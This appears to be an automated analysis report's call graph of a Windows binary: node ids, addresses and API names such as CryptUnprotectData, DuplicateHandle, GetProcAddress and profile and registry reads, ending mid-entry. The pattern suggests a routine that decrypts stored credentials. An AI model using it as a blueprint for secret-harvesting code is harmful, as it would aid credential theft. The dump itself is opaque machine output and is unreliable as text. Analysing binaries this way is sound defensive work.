39101->39102 39111 40de88 39102->39111 39103 40e00c 39104 413d29 ??3@YAXPAX FreeLibrary 39103->39104 39105 40e014 39104->39105 39105->39018 39105->39021 39106 40dea9 _wcsicmp 39107 40dee7 OpenProcess 39106->39107 39108 40debd _wcsicmp 39106->39108 39107->39111 39108->39107 39109 40ded0 _wcsicmp 39108->39109 39109->39107 39109->39111 39110 40dfef CloseHandle 39110->39111 39111->39103 39111->39106 39111->39110 39112 40df78 39111->39112 39113 40df23 GetCurrentProcess DuplicateHandle 39111->39113 39112->39110 39117 40df8f CloseHandle 39112->39117 39118 40dfae _wcsicmp 39112->39118 39113->39111 39114 40df4c memset 39113->39114 39115 41352f 9 API calls 39114->39115 39116 40df6f 39115->39116 39116->39112 39116->39117 39117->39112 39118->39111 39118->39112 39120 409a74 GetTempFileNameW 39119->39120 39121 409a66 GetWindowsDirectoryW 39119->39121 39120->39031 39121->39120 39122->39033 39124 406bd5 39123->39124 39125 406bad 39123->39125 39127 4066bf ??3@YAXPAX malloc memcpy ??3@YAXPAX ??3@YAXPAX 39124->39127 39132 406c0f 39124->39132 39125->39124 39126 406bba _wcsicmp 39125->39126 39126->39124 39126->39125 39128 406be5 39127->39128 39129 40afcf ??2@YAPAXI ??3@YAXPAX 39128->39129 39128->39132 39130 406bff 39129->39130 39131 4068bf SetFilePointerEx memcpy ReadFile ??2@YAPAXI ??3@YAXPAX 39130->39131 39131->39132 39132->39042 39132->39043 39135 406ed1 39133->39135 39134 407424 39134->39049 39135->39134 39136 40b633 ??3@YAXPAX 39135->39136 39140 406f4e 39136->39140 39137 406f73 memset 39137->39140 39138 407080 ??3@YAXPAX 39138->39140 39139 40718b 39142 4069df memcpy 39139->39142 39152 40730b 39139->39152 39140->39137 39140->39138 39141 4099f4 malloc memcpy ??3@YAXPAX 39140->39141 39143 4069df memcpy 39140->39143 39145 406a10 memcpy 39140->39145 39146 406aa2 memcpy 39140->39146 39147 4070d4 39140->39147 39141->39140 39153 4071f1 39142->39153 39143->39140 39144 4069df memcpy 39144->39147 39145->39140 39146->39140 39147->39134 39147->39139 39147->39144 39148 40717b 39147->39148 39149 4069df memcpy 39148->39149 39149->39139 39150 406c5a 6 API calls 39150->39152 39151 406c28 ??2@YAPAXI ??3@YAXPAX 39151->39152 39152->39134 39152->39150 39152->39151 39153->39152 39154 4069df memcpy 39153->39154 39154->39153 39156 4069c4 ??3@YAXPAX 39155->39156 39157 4069af 39156->39157 39158 40b633 ??3@YAXPAX 39157->39158 39159 4069ba 39158->39159 39160 40b04b ??3@YAXPAX 39159->39160 39161 4069c2 39160->39161 39161->39014 39162->39049 39163->39049 39164->39049 39165->39073 39167 40aa33 39166->39167 39168 40aa63 39166->39168 39169 40aa44 39167->39169 39170 40aa38 wcslen 39167->39170 39168->39061 39171 40a9ce malloc memcpy ??3@YAXPAX ??3@YAXPAX 39169->39171 39170->39169 39172 40aa4d 39171->39172 39172->39168 39173 40aa51 memcpy 39172->39173 39173->39168 39174->39061 39175->39061 39177 40a980 39176->39177 39178 40a8bb 39177->39178 39179 40a995 _wcsicmp 39177->39179 39180 40a99c wcscmp 39177->39180 39178->38921 39178->38922 39179->39177 39180->39177 39181->38925 39182->38929 39184 40aa23 RegEnumValueW 39183->39184 39184->38936 39184->38937 39186 405335 39185->39186 39187 40522a 39185->39187 39186->38514 39188 40b2cc 27 API calls 39187->39188 39189 405234 39188->39189 39190 40a804 8 API calls 39189->39190 39191 40523a 39190->39191 39230 40b273 39191->39230 39193 405248 _mbscpy _mbscat GetProcAddress 39194 40b273 27 API calls 39193->39194 39195 405279 39194->39195 39233 405211 GetProcAddress 39195->39233 39197 405282 39198 40b273 27 API calls 39197->39198 39199 40528f 39198->39199 39234 405211 GetProcAddress 39199->39234 39201 405298 39202 40b273 27 API calls 39201->39202 39203 4052a5 39202->39203 39235 405211 GetProcAddress 39203->39235 39205 4052ae 39206 40b273 27 API calls 39205->39206 39207 4052bb 39206->39207 39236 405211 GetProcAddress 39207->39236 39209 4052c4 39210 40b273 27 API calls 39209->39210 39211 4052d1 39210->39211 39237 405211 GetProcAddress 39211->39237 39231 40b58d 27 API calls 39230->39231 39232 40b18c 39231->39232 39232->39193 39233->39197 39234->39201 39235->39205 39236->39209 39243 405220 39 API calls 39242->39243 39244 405369 39243->39244 39244->38954 39244->38955 39245->38957 39246->38961 39247->38958 39248->38955 39250 40440c FreeLibrary 39249->39250 39251 40436d 39250->39251 39252 40a804 8 API calls 39251->39252 39253 404377 39252->39253 39254 404383 39253->39254 39255 404405 39253->39255 39256 40b273 27 API calls 39254->39256 39255->38526 39255->38528 39255->38529 39257 40438d GetProcAddress 39256->39257 39258 40b273 27 API calls 39257->39258 39259 4043a7 GetProcAddress 39258->39259 39260 40b273 27 API calls 39259->39260 39261 4043ba GetProcAddress 39260->39261 39262 40b273 27 API calls 39261->39262 39263 4043ce GetProcAddress 39262->39263 39264 40b273 27 API calls 39263->39264 39265 4043e2 GetProcAddress 39264->39265 39266 4043f1 39265->39266 39267 4043f7 39266->39267 39268 40440c FreeLibrary 39266->39268 39267->39255 39268->39255 39270 404413 FreeLibrary 39269->39270 39271 40441e 39269->39271 39270->39271 39271->38543 39272->38535 39274 40447e 39273->39274 39275 40442e 39273->39275 39276 404485 CryptUnprotectData 39274->39276 39277 40449c 39274->39277 39278 40b2cc 27 API calls 39275->39278 39276->39277 39277->38535 39279 404438 39278->39279 39280 40a804 8 API calls 39279->39280 39281 40443e 39280->39281 39282 404445 39281->39282 39283 404467 39281->39283 39284 40b273 27 API calls 39282->39284 39283->39274 39286 404475 FreeLibrary 39283->39286 39285 40444f GetProcAddress 39284->39285 39285->39283 39287 404460 39285->39287 39286->39274 39287->39283 39289 4135f6 39288->39289 39290 4135eb FreeLibrary 39288->39290 39289->38546 39290->39289 39292 4449c4 39291->39292 39293 444a52 39291->39293 39318 403a29 39317->39318 39332 403bed memset memset 39318->39332 39320 403ae7 39345 40b1ab ??3@YAXPAX ??3@YAXPAX 39320->39345 39321 403a3f memset 39326 403a2f 39321->39326 39323 403aef 39323->38581 39324 40a8d0 7 API calls 39324->39326 39325 409d1f 6 API calls 39325->39326 39326->39320 39326->39321 39326->39324 39326->39325 39327 409b98 GetFileAttributesW 39326->39327 39327->39326 39329 40a051 GetFileTime FindCloseChangeNotification 39328->39329 39330 4039ca CompareFileTime 39328->39330 39329->39330 39330->38581 39331->38582 39333 414c2e 17 API calls 39332->39333 39334 403c38 39333->39334 39335 409719 2 API calls 39334->39335 39336 403c3f wcscat 39335->39336 39337 414c2e 17 API calls 39336->39337 39338 403c61 39337->39338 39339 409719 2 API calls 39338->39339 39340 403c68 wcscat 39339->39340 39346 403af5 39340->39346 39343 403af5 20 API calls 39344 403c95 39343->39344 39344->39326 39345->39323 39347 403b02 39346->39347 39348 40ae18 9 API calls 39347->39348 39356 403b37 39348->39356 39349 403bdb 39350 40aebe FindClose 39349->39350 39351 403be6 39350->39351 39351->39343 39352 40ae18 9 API calls 39352->39356 39353 40ae51 9 API calls 39353->39356 39354 40aebe FindClose 39354->39356 39355 40add4 wcscmp wcscmp 39355->39356 39356->39349 39356->39352 39356->39353 39356->39354 39356->39355 39357 40a8d0 7 API calls 39356->39357 39357->39356 39359 409d1f 6 API calls 39358->39359 39360 404190 39359->39360 39373 409b98 GetFileAttributesW 39360->39373 39362 40419c 39363 4041a7 6 API calls 39362->39363 39364 40435c 39362->39364 39365 40424f 39363->39365 39364->38608 39365->39364 39367 40425e memset 39365->39367 39369 409d1f 6 API calls 39365->39369 39370 40a8ab 9 API calls 39365->39370 39374 414842 39365->39374 39367->39365 39368 404296 wcscpy 39367->39368 39368->39365 39369->39365 39371 4042b6 memset memset _snwprintf wcscpy 39370->39371 39371->39365 39372->38606 39373->39362 39377 41443e 39374->39377 39376 414866 39376->39365 39378 41444b 39377->39378 39379 414451 39378->39379 39380 4144a3 GetPrivateProfileStringW 39378->39380 39381 414491 39379->39381 39382 414455 wcschr 39379->39382 39380->39376 39384 414495 WritePrivateProfileStringW 39381->39384 39382->39381 39383 414463 _snwprintf 39382->39383 39383->39384 39384->39376 39385->38612 39387 40b2cc 27 API calls 39386->39387 39388 409615 39387->39388 39389 409d1f 6 API calls 39388->39389 39390 409625 39389->39390 39415 409b98 GetFileAttributesW 39390->39415 39392 409634 39393 409648 39392->39393 39416 4091b8 memset 39392->39416 39395 40b2cc 27 API calls 39393->39395 39398 408801 39393->39398 39396 40965d 39395->39396 39397 409d1f 6 API calls 39396->39397 39399 40966d 39397->39399 39398->38615 39398->38643 39468 409b98 GetFileAttributesW 39399->39468 39401 40967c 39401->39398 39402 409681 39401->39402 39415->39392 39470 40a6e6 WideCharToMultiByte 39416->39470 39418 409202 39471 444432 39418->39471 39421 40b273 27 API calls 39447 40951d 39447->39393 39468->39401 39470->39418 39472 4438b5 11 API calls 39471->39472 39473 44444c 39472->39473 39474 409215 39473->39474 39575 415a6d 39473->39575 39474->39421 39474->39447 39576 415a77 39575->39576 39878 413f4f 39851->39878 39854 413f37 K32GetModuleFileNameExW 39855 413f4a 39854->39855 39855->38675 39857 413969 wcscpy 39856->39857 39858 41396c wcschr 39856->39858 39869 413a3a 39857->39869 39858->39857 39860 41398e 39858->39860 39883 4097f7 wcslen wcslen _memicmp 39860->39883 39862 41399a 39863 4139a4 memset 39862->39863 39864 4139e6 39862->39864 39884 409dd5 GetWindowsDirectoryW wcscpy 39863->39884 39865 413a31 wcscpy 39864->39865 39866 4139ec memset 39864->39866 39865->39869 39885 409dd5 GetWindowsDirectoryW wcscpy 39866->39885 39869->38675 39870 4139c9 wcscpy wcscat 39870->39869 39871 413a11 memcpy wcscat 39871->39869 39873 413cb0 GetModuleHandleW 39872->39873 39874 413cda 39872->39874 39873->39874 39875 413cbf GetProcAddress 39873->39875 39876 413ce3 GetProcessTimes 39874->39876 39877 413cf6 39874->39877 39875->39874 39876->38677 39877->38677 39879 413f2f 39878->39879 39880 413f54 39878->39880 39879->39854 39879->39855 39881 40a804 8 API calls 39880->39881 39882 413f5f GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 39881->39882 39882->39879 39883->39862 39884->39870 39885->39871 39886->38698 39887->38720 39889 409cf9 GetVersionExW 39888->39889 39890 409d0a 39888->39890 39889->39890 39890->38727 39890->38732 39891->38734 39892->38737 39893->38739 39894->38804 39896 40bba5 39895->39896 39953 40cc26 39896->39953 39899 40bd4b 39974 40cc0c 39899->39974 39904 40b2cc 27 API calls 39905 40bbef 39904->39905 39981 40ccf0 _wcsicmp 39905->39981 39907 40bbf5 39907->39899 39982 40ccb4 6 API calls 39907->39982 39909 40bc26 39910 40cf04 17 API calls 39909->39910 39911 40bc2e 39910->39911 39912 40bd43 39911->39912 39913 40b2cc 27 API calls 39911->39913 39914 40cc0c 4 API calls 39912->39914 39915 40bc40 39913->39915 39914->39899 39983 40ccf0 _wcsicmp 39915->39983 39917 40bc46 39917->39912 39918 40bc61 memset memset WideCharToMultiByte 39917->39918 39984 40103c strlen 39918->39984 39920 40bcc0 39921 40b273 27 API calls 39920->39921 39922 40bcd0 memcmp 39921->39922 39922->39912 39923 40bce2 39922->39923 39924 404423 38 API calls 39923->39924 39925 40bd10 39924->39925 39925->39912 39926 40bd3a LocalFree 39925->39926 39927 40bd1f memcpy 39925->39927 39926->39912 39927->39926 39928->38819 39930 42533e 16 API calls 39929->39930 39931 42541f 39930->39931 39932 424ff0 13 API calls 39931->39932 39933 425425 39932->39933 39934 42538f 16 API calls 39933->39934 39935 42542d 39934->39935 39935->38856 39937 42533e 16 API calls 39936->39937 39938 4253fb 39937->39938 39939 42538f 16 API calls 39938->39939 39940 42540b 39939->39940 39940->38856 39942 40b65c 39941->39942 39943 40b697 SystemTimeToFileTime 39942->39943 39944 40b681 39942->39944 40036 44d9c0 39943->40036 39944->38856 39946 40b6d6 FileTimeToLocalFileTime 39946->39944 39947->38856 39948->38856 39949->38856 39950->38856 39951->38831 39952->38853 39985 4096c3 CreateFileW 39953->39985 39955 40cc34 39956 40cc3d GetFileSize 39955->39956 39964 40bbca 39955->39964 39957 40afcf 2 API calls 39956->39957 39958 40cc64 39957->39958 39986 40a2ef ReadFile 39958->39986 39960 40cc71 39987 40ab4a MultiByteToWideChar 39960->39987 39962 40cc95 FindCloseChangeNotification 39963 40b04b ??3@YAXPAX 39962->39963 39963->39964 39964->39899 39965 40cf04 39964->39965 39966 40b633 ??3@YAXPAX 39965->39966 39967 40cf14 39966->39967 39993 40b1ab ??3@YAXPAX ??3@YAXPAX 39967->39993 39969 40cf1b 39971 40cfef 39969->39971 39973 40bbdd 39969->39973 39994 40cd4b 39969->39994 39972 40cd4b 14 API calls 39971->39972 39972->39973 39973->39899 39973->39904 39975 40b633 ??3@YAXPAX 39974->39975 39976 40cc15 39975->39976 39977 40aa04 ??3@YAXPAX 39976->39977 39978 40cc1d 39977->39978 40035 40b1ab ??3@YAXPAX ??3@YAXPAX 39978->40035 39980 40b7d4 memset CreateFileW 39980->38811 39980->38812 39981->39907 39982->39909 39983->39917 39984->39920 39985->39955 39986->39960 39988 40ab93 39987->39988 39989 40ab6b 39987->39989 39988->39962 39990 40a9ce 4 API calls 39989->39990 39991 40ab74 39990->39991 39992 40ab7c MultiByteToWideChar 39991->39992 39992->39988 39993->39969 39995 40cd7b 39994->39995 39996 40aa29 6 API calls 39995->39996 40000 40cd89 39996->40000 39997 40cef5 39998 40aa04 ??3@YAXPAX 39997->39998 39999 40cefd 39998->39999 39999->39969 40000->39997 40001 40aa29 6 API calls 40000->40001 40002 40ce1d 40001->40002 40003 40aa29 6 API calls 40002->40003 40004 40ce3e 40003->40004 40005 40ce6a 40004->40005 40028 40abb7 wcslen memmove 40004->40028 40006 40ce9f 40005->40006 40031 40abb7 wcslen memmove 40005->40031 40009 40a8d0 7 API calls 40006->40009 40011 40ceb5 40009->40011 40010 40ce56 40029 40aa71 wcslen 40010->40029 40017 40a8d0 7 API calls 40011->40017 40013 40ce8b 40032 40aa71 wcslen 40013->40032 40014 40ce5e 40030 40abb7 wcslen memmove 40014->40030 40019 40cecb 40017->40019 40018 40ce93 40033 40abb7 wcslen memmove 40018->40033 40034 40d00b malloc memcpy ??3@YAXPAX ??3@YAXPAX 40019->40034 40022 40cedd 40023 40aa04 ??3@YAXPAX 40022->40023 40024 40cee5 40023->40024 40025 40aa04 ??3@YAXPAX 40024->40025 40026 40ceed 40025->40026 40027 40aa04 ??3@YAXPAX 40026->40027 40027->39997 40028->40010 40029->40014 40030->40005 40031->40013 40032->40018 40033->40006 40034->40022 40035->39980 40036->39946 40037->38872 40038->38880 40039 4426a9 40044 4324d3 40039->40044 40041 4426d2 40058 431a7b 40041->40058 40043 4426e3 40045 4324e3 40044->40045 40046 4324da 40044->40046 40050 4324e8 40045->40050 40126 43240a 12 API calls 40045->40126 40047 415a91 memset 40046->40047 40047->40045 40049 4324fd 40051 432513 40049->40051 40052 432508 40049->40052 40050->40041 40128 43034a memcpy 40051->40128 40127 4325ad memset 40052->40127 40055 432548 40129 43034a memcpy 40055->40129 40057 43250e 40057->40041 40059 431aa3 40058->40059 40115 431b2e 40058->40115 40059->40115 40130 43817e 40059->40130 40062 432116 40164 4325ad memset 40062->40164 40065 432122 40065->40043 40067 431ad5 40069 431b04 40067->40069 40067->40115 40135 42faf4 12 API calls 40067->40135 40068 431b15 40071 431baa 40068->40071 40072 431b7c memcmp 40068->40072 40068->40115 40136 42ff8c 40069->40136 40074 431bb0 40071->40074 40075 431bcb 40071->40075 40072->40071 40089 431b95 40072->40089 40145 4169a7 11 API calls 40074->40145 40077 431bd1 40075->40077 40078 431c45 40075->40078 40146 43034a memcpy 40077->40146 40148 4165ff 40078->40148 40081 431bdc 40081->40115 40147 430468 11 API calls 40081->40147 40084 431c65 40090 431cba 40084->40090 40084->40115 40151 42bf4c 14 API calls 40084->40151 40086 431bef 40086->40084 40086->40089 40086->40115 40087 415a91 memset 40091 431d17 40087->40091 40088 431ca1 40088->40115 40152 42bfcf memcpy 40088->40152 40089->40115 40144 4169a7 11 API calls 40089->40144 40090->40087 40092 431d27 memcpy 40091->40092 40091->40115 40095 431e97 40092->40095 40100 431da8 40092->40100 40094 431eb8 40154 4169a7 11 API calls 40094->40154 40096 431f3c 40095->40096 40110 431f6a 40095->40110 40098 431fc3 40096->40098 40099 431f45 40096->40099 40157 4397fd memset 40098->40157 40155 4172c8 memset 40099->40155 40100->40094 40100->40095 40103 431e12 memcpy 40100->40103 40100->40115 40153 430af5 16 API calls 40100->40153 40102 431fd4 40102->40115 40158 4328e4 12 API calls 40102->40158 40103->40100 40107 431feb 40159 4233ae 11 API calls 40107->40159 40109 431ffc 40111 43202e 40109->40111 40114 4165ff 11 API calls 40109->40114 40110->40115 40156 4169a7 11 API calls 40110->40156 40160 42fe8b 22 API calls 40111->40160 40114->40111 40163 42c02e memset 40115->40163 40116 432057 40116->40115 40161 431917 23 API calls 40116->40161 40118 432079 40162 430b5d 11 API calls 40118->40162 40126->40049 40127->40057 40128->40055 40129->40057 40131 438187 40130->40131 40132 431ab6 40130->40132 40165 4380f6 40131->40165 40132->40068 40132->40115 40134 43041c 12 API calls 40132->40134 40134->40067 40135->40069 40137 43817e 139 API calls 40136->40137 40138 42ff99 40137->40138 40139 42ffe3 40138->40139 40140 42ffd0 40138->40140 40143 42ff9d 40138->40143 40388 4169a7 11 API calls 40139->40388 40387 4169a7 11 API calls 40140->40387 40143->40068 40144->40115 40145->40115 40146->40081 40147->40086 40149 4165a0 11 API calls 40148->40149 40150 41660d 40149->40150 40150->40084 40151->40088 40152->40090 40153->40100 40154->40115 40155->40115 40156->40115 40157->40102 40158->40107 40159->40109 40160->40116 40161->40118 40163->40062 40164->40065 40167 43811f 40165->40167 40166 438164 40166->40132 40167->40166 40169 4300e8 3 API calls 40167->40169 40170 437e5e 40167->40170 40169->40167 40193 437d3c 40170->40193 40172 437eb3 40172->40167 40173 437ea9 40173->40172 40179 437f22 40173->40179 40208 41f432 40173->40208 40176 437f06 40255 415c56 11 API calls 40176->40255 40178 437f95 40256 415c56 11 API calls 40178->40256 40180 432d4e 3 API calls 40179->40180 40183 437f7f 40179->40183 40180->40183 40181 43802b 40184 4165ff 11 API calls 40181->40184 40183->40178 40183->40181 40185 438054 40184->40185 40219 437371 40185->40219 40188 43806b 40189 438094 40188->40189 40257 42f50e 138 API calls 40188->40257 40191 437fa3 40189->40191 40192 4300e8 3 API calls 40189->40192 40191->40172 40258 41f638 104 API calls 40191->40258 40192->40191 40194 437d69 40193->40194 40197 437d80 40193->40197 40259 437ccb 11 API calls 40194->40259 40196 437d76 40196->40173 40197->40196 40198 437da3 40197->40198 40199 437d90 40197->40199 40201 438460 134 API calls 40198->40201 40199->40196 40263 437ccb 11 API calls 40199->40263 40204 437dcb 40201->40204 40202 437de8 40262 424f26 123 API calls 40202->40262 40204->40202 40260 444283 13 API calls 40204->40260 40206 437dfc 40261 437ccb 11 API calls 40206->40261 40209 41f54d 40208->40209 40215 41f44f 40208->40215 40210 41f466 40209->40210 40293 41c635 memset memset 40209->40293 40210->40176 40210->40179 40215->40210 40217 41f50b 40215->40217 40264 41f1a5 40215->40264 40289 41c06f memcmp 40215->40289 40290 41f3b1 90 API calls 40215->40290 40291 41f398 86 API calls 40215->40291 40217->40209 40217->40210 40292 41c295 86 API calls 40217->40292 40220 41703f 11 API calls 40219->40220 40221 437399 40220->40221 40222 43739d 40221->40222 40224 4373ac 40221->40224 40380 4446ea 11 API calls 40222->40380 40225 416935 16 API calls 40224->40225 40226 4373ca 40225->40226 40228 438460 134 API calls 40226->40228 40232 4251c4 137 API calls 40226->40232 40237 415a91 memset 40226->40237 40239 425413 17 API calls 40226->40239 40240 43758f 40226->40240 40244 42533e 16 API calls 40226->40244 40249 437584 40226->40249 40252 42538f 16 API calls 40226->40252 40254 437d3c 135 API calls 40226->40254 40381 425433 13 API calls 40226->40381 40382 42453e 123 API calls 40226->40382 40227 4375bc 40230 415c7d 16 API calls 40227->40230 40228->40226 40231 4375d2 40230->40231 40233 4442e6 11 API calls 40231->40233 40235 4373a7 40231->40235 40232->40226 40234 4375e2 40233->40234 40234->40235 40385 444283 13 API calls 40234->40385 40235->40188 40237->40226 40239->40226 40383 42453e 123 API calls 40240->40383 40241 4375f4 40246 437620 40241->40246 40247 43760b 40241->40247 40244->40226 40245 43759f 40248 416935 16 API calls 40245->40248 40251 416935 16 API calls 40246->40251 40386 444283 13 API calls 40247->40386 40248->40249 40249->40227 40384 42453e 123 API calls 40249->40384 40251->40235 40252->40226 40253 437612 memcpy 40253->40235 40254->40226 40255->40172 40256->40191 40257->40189 40258->40172 40259->40196 40260->40206 40261->40202 40262->40196 40263->40196 40294 41bc3b 40264->40294 40267 41edad 86 API calls 40268 41f1cb 40267->40268 40269 41f1f5 memcmp 40268->40269 40270 41f20e 40268->40270 40274 41f282 40268->40274 40269->40270 40271 41f21b memcmp 40270->40271 40270->40274 40272 41f326 40271->40272 40275 41f23d 40271->40275 40273 41ee6b 86 API calls 40272->40273 40272->40274 40273->40274 40274->40215 40275->40272 40276 41f28e memcmp 40275->40276 40318 41c8df 56 API calls 40275->40318 40276->40272 40277 41f2a9 40276->40277 40277->40272 40280 41f308 40277->40280 40281 41f2d8 40277->40281 40279 41f269 40279->40272 40282 41f287 40279->40282 40283 41f27a 40279->40283 40280->40272 40320 4446ce 11 API calls 40280->40320 40284 41ee6b 86 API calls 40281->40284 40282->40276 40285 41ee6b 86 API calls 40283->40285 40286 41f2e0 40284->40286 40285->40274 40319 41b1ca memset 40286->40319 40289->40215 40290->40215 40291->40215 40292->40209 40293->40210 40295 41be0b 40294->40295 40297 41bc54 40294->40297 40301 41bd61 40295->40301 40329 41ae17 34 API calls 40295->40329 40297->40295 40297->40301 40302 41bc8d 40297->40302 40321 41baf0 55 API calls 40297->40321 40299 41be45 40299->40267 40299->40274 40301->40299 40330 41a25f memset 40301->40330 40302->40301 40305 41bd42 40302->40305 40308 41bd18 40302->40308 40322 4151e3 40302->40322 40303 41be04 40328 41aee4 56 API calls 40303->40328 40305->40301 40305->40303 40306 41bdd8 memset 40305->40306 40307 41bdba 40305->40307 40309 41bde7 memcmp 40306->40309 40317 4175ed 6 API calls 40307->40317 40308->40301 40308->40305 40326 41a9da 86 API calls 40308->40326 40309->40303 40310 41bdfd 40309->40310 40327 41a1b0 memset 40310->40327 40311 41bdcc 40311->40301 40311->40309 40317->40311 40318->40279 40319->40274 40320->40272 40321->40302 40331 41837f 40322->40331 40325 444706 11 API calls 40325->40308 40326->40305 40327->40303 40328->40295 40329->40301 40330->40299 40332 4183c1 40331->40332 40333 4183ca 40331->40333 40378 418197 25 API calls 40332->40378 40351 4151f9 40333->40351 40352 418160 40333->40352 40336 4183e5 40336->40351 40361 41739b 40336->40361 40339 418444 CreateFileW 40341 418477 40339->40341 40340 41845f CreateFileA 40340->40341 40342 4184c2 memset 40341->40342 40343 41847e GetLastError ??3@YAXPAX 40341->40343 40364 418758 40342->40364 40344 4184b5 40343->40344 40345 418497 40343->40345 40379 444706 11 API calls 40344->40379 40348 41837f 49 API calls 40345->40348 40348->40351 40351->40308 40351->40325 40353 41739b GetVersionExW 40352->40353 40354 418165 40353->40354 40356 4173e4 MultiByteToWideChar malloc MultiByteToWideChar ??3@YAXPAX 40354->40356 40357 418178 40356->40357 40358 41817f 40357->40358 40359 41748f AreFileApisANSI WideCharToMultiByte malloc WideCharToMultiByte ??3@YAXPAX 40357->40359 40358->40336 40360 418188 ??3@YAXPAX 40359->40360 40360->40336 40362 4173d6 40361->40362 40363 4173ad GetVersionExW 40361->40363 40362->40339 40362->40340 40363->40362 40365 418680 43 API calls 40364->40365 40366 418782 40365->40366 40367 418506 ??3@YAXPAX 40366->40367 40368 418160 11 API calls 40366->40368 40367->40351 40369 418799 40368->40369 40369->40367 40370 41739b GetVersionExW 40369->40370 40371 4187a7 40370->40371 40372 4187da 40371->40372 40373 4187ad GetDiskFreeSpaceW 40371->40373 40374 4187ec GetDiskFreeSpaceA 40372->40374 40376 4187e8 40372->40376 40377 418800 ??3@YAXPAX 40373->40377 40374->40377 40376->40374 40377->40367 40378->40333 40379->40351 40380->40235 40381->40226 40382->40226 40383->40245 40384->40227 40385->40241 40386->40253 40387->40143 40388->40143 40389 4147f3 40392 414561 40389->40392 40391 414813 40393 41456d 40392->40393 40394 41457f GetPrivateProfileIntW 40392->40394 40397 4143f1 memset _itow WritePrivateProfileStringW 40393->40397 40394->40391 40396 41457a 40396->40391 40397->40396 40398 44def7 40399 44df07 40398->40399 40400 44df00 ??3@YAXPAX 40398->40400 40401 44df17 40399->40401 40402 44df10 ??3@YAXPAX 40399->40402 40400->40399 40403 44df27 40401->40403 40404 44df20 ??3@YAXPAX 40401->40404 40402->40401 40405 44df37 40403->40405 40406 44df30 ??3@YAXPAX 40403->40406 40404->40403 40406->40405 40407 4148b6 FindResourceW 40408 4148f9 40407->40408 40409 4148cf SizeofResource 40407->40409 40409->40408 40410 4148e0 LoadResource 40409->40410 40410->40408 40411 4148ee LockResource 40410->40411 40411->40408 40412 441b3f 40422 43a9f6 40412->40422 40414 441b61 40595 4386af memset 40414->40595 40416 44189a 40417 4418e2 40416->40417 40421 442bd4 40416->40421 40418 4418ea 40417->40418 40596 4414a9 12 API calls 40417->40596 40421->40418 40597 441409 memset 40421->40597 40423 43aa20 40422->40423 40424 43aadf 40422->40424 40423->40424 40425 43aa34 memset 40423->40425 40424->40414 40426 43aa56 40425->40426 40427 43aa4d 40425->40427 40598 43a6e7 40426->40598 40606 42c02e memset 40427->40606 40432 43aad3 40608 4169a7 11 API calls 40432->40608 40433 43aaae 40433->40424 40433->40432 40448 43aae5 40433->40448 40435 43ac18 40437 43ac47 40435->40437 40610 42bbd5 memcpy memcpy memcpy memset memcpy 40435->40610 40438 43aca8 40437->40438 40611 438eed 16 API calls 40437->40611 40441 43acd5 40438->40441 40613 4233ae 11 API calls 40438->40613 40614 423426 11 API calls 40441->40614 40442 43ac87 40612 4233c5 16 API calls 40442->40612 40446 43ace1 40615 439811 163 API calls 40446->40615 40447 43a9f6 161 API calls 40447->40448 40448->40424 40448->40435 40448->40447 40609 439bbb 22 API calls 40448->40609 40450 43acfd 40456 43ad2c 40450->40456 40616 438eed 16 API calls 40450->40616 40452 43ad19 40617 4233c5 16 API calls 40452->40617 40453 43ad58 40618 44081d 163 API calls 40453->40618 40456->40453 40459 43add9 40456->40459 40458 43ae3a memset 40460 43ae73 40458->40460 40459->40459 40622 423426 11 API calls 40459->40622 40623 42e1c0 147 API calls 40460->40623 40461 43adab 40620 438c4e 163 API calls 40461->40620 40463 43ad6c 40463->40424 40463->40461 40619 42370b memset memcpy memset 40463->40619 40465 43adcc 40621 440f84 12 API calls 40465->40621 40466 43ae96 40624 42e1c0 147 API calls 40466->40624 40470 43aea8 40471 43aec1 40470->40471 40625 42e199 147 API calls 40470->40625 40473 43af00 40471->40473 40626 42e1c0 147 API calls 40471->40626 40473->40424 40476 43af1a 40473->40476 40477 43b3d9 40473->40477 40627 438eed 16 API calls 40476->40627 40482 43b3f6 40477->40482 40487 43b4c8 40477->40487 40479 43b60f 40479->40424 40686 4393a5 17 API calls 40479->40686 40480 43af2f 40628 4233c5 16 API calls 40480->40628 40668 432878 12 API calls 40482->40668 40484 43af51 40629 423426 11 API calls 40484->40629 40486 43b4f2 40675 43a76c 21 API calls 40486->40675 40487->40486 40674 42bbd5 memcpy memcpy memcpy memset memcpy 40487->40674 40489 43af7d 40630 423426 11 API calls 40489->40630 40493 43b529 40676 44081d 163 API calls 40493->40676 40494 43b428 40520 43b462 40494->40520 40669 432b60 16 API calls 40494->40669 40495 43af94 40631 423330 11 API calls 40495->40631 40499 43b47e 40509 43b497 40499->40509 40671 42374a memcpy memset memcpy memcpy memcpy 40499->40671 40500 43b544 40511 43b55c 40500->40511 40677 42c02e memset 40500->40677 40501 43afca 40632 423330 11 API calls 40501->40632 40506 43afdb 40633 4233ae 11 API calls 40506->40633 40508 43b56c 40514 43b58a 40508->40514 40679 423330 11 API calls 40508->40679 40672 4233ae 11 API calls 40509->40672 40510 43b4b1 40673 423399 11 API calls 40510->40673 40678 43a87a 163 API calls 40511->40678 40513 43afee 40634 44081d 163 API calls 40513->40634 40680 440f84 12 API calls 40514->40680 40519 43b4c1 40682 42db80 163 API calls 40519->40682 40670 423330 11 API calls 40520->40670 40522 43b592 40681 43a82f 16 API calls 40522->40681 40525 43b5b4 40683 438c4e 163 API calls 40525->40683 40527 43b5cf 40684 42c02e memset 40527->40684 40529 43b1ef 40645 4233c5 16 API calls 40529->40645 40530 43b005 40530->40424 40532 43b01f 40530->40532 40635 42d836 163 API calls 40530->40635 40532->40529 40643 423330 11 API calls 40532->40643 40644 42d71d 163 API calls 40532->40644 40533 43b212 40646 423330 11 API calls 40533->40646 40535 43b087 40636 4233ae 11 API calls 40535->40636 40537 43add4 40537->40479 40685 438f86 16 API calls 40537->40685 40541 43b22a 40647 42ccb5 11 API calls 40541->40647 40543 43b10f 40639 423330 11 API calls 40543->40639 40544 43b23f 40648 4233ae 11 API calls 40544->40648 40546 43b257 40649 4233ae 11 API calls 40546->40649 40550 43b129 40640 4233ae 11 API calls 40550->40640 40551 43b26e 40650 4233ae 11 API calls 40551->40650 40554 43b09a 40554->40543 40637 42cc15 19 API calls 40554->40637 40638 4233ae 11 API calls 40554->40638 40555 43b282 40651 43a87a 163 API calls 40555->40651 40557 43b13c 40641 440f84 12 API calls 40557->40641 40559 43b29d 40652 423330 11 API calls 40559->40652 40562 43b15f 40642 4233ae 11 API calls 40562->40642 40563 43b2af 40565 43b2b8 40563->40565 40566 43b2ce 40563->40566 40653 4233ae 11 API calls 40565->40653 40654 